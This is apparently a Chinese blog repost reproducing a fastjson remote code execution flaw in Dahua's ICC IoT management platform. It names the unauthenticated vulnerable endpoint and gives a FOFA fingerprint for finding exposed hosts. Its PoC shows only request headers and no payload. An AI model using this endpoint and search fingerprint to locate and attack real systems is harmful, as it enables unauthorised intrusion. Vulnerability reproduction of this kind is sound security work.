首页 前端知识 大华智能物联综合管理平台 fastjson远程代码执行漏洞复现

大华智能物联综合管理平台 fastjson远程代码执行漏洞复现

2024-05-26 00:05:09 前端知识 前端哥 673 137 我要收藏

0x01 产品简介

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。

0x02 漏洞概述

由于大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用 /evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。

0x03 复现环境

FOFA:icon_hash="-1935899595"

55c94e78f2374cca9f64eb8ad1cb8fae.png

0x04 漏洞复现

PoC

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
转载请注明出处或者链接地址:https://www.qianduange.cn//article/9573.html
标签
web安全
评论
发布的文章

html5怎么实现语音搜索

2024-06-01 10:06:32

HTML5

2024-02-27 11:02:15

HTML - 头部元素

2024-06-01 10:06:06

大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!